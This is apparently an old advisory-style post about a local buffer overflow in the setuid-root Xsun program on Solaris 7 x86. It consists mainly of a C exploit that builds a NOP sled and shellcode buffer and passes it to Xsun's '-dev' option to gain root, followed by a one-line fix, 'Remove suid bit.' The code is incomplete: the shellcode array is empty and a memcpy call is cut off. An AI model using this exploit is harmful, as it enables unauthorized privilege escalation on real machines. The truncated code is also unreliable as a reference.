

    Solaris x86


    Theodor Ragnar Gislason found following.  There exists an overflow
    in  /usr/openwin/bin/Xsun  setuid  root  program  on solaris 7 x86
    version,  not  sure  about  sol  8.   This  bug was discovered and
    exploited sometime in '98.  The program comes default setgid  root
    on the sparc version of solaris.  It is not checked wether this is
    exploitable on sparc.

    * Solaris 7  Xsun(suid) local overflow - PRIVATE for now!
    * Solaris 2.7/(2.6?) x86 sploit no sparc code, yet!
    * Discovered/sploited By DiGiT -
    * Greets: #!ADM, #!
    #include <stdio.h>
    #include <stdlib.h>
    // Generic solaris x86 shellcode by cheeze wizz
    char shellcode[] =
    long get_esp() { __asm__("movl %esp,%eax"); }
    int main(int argc, char *argv[]) {
      char buff[5000];
      int nopcount=2001, bsize=4000, offset=1850;
      int i;
      if (argc > 1) nopcount  = atoi(argv[1]);
      if (argc > 2) bsize  = atoi(argv[2]);
      if (argc > 3) offset = atoi(argv[3]);
            memset (buff, 0x90, bsize);
                    for (i = nopcount; i < bsize - 4; i += 4)
                    *(long *) &buff[i] = get_esp() + offset;
            memcpy (buff + (nopcount - strlen (shellcode)), shellcode, strlen
                memcpy (buff, ":", 1);
             printf("Oh boy. DiGiT presents r00t\n");
             execl("/usr/openwin/bin/Xsun", "Xsun", "-dev", buff, NULL);


    Remove suid bit.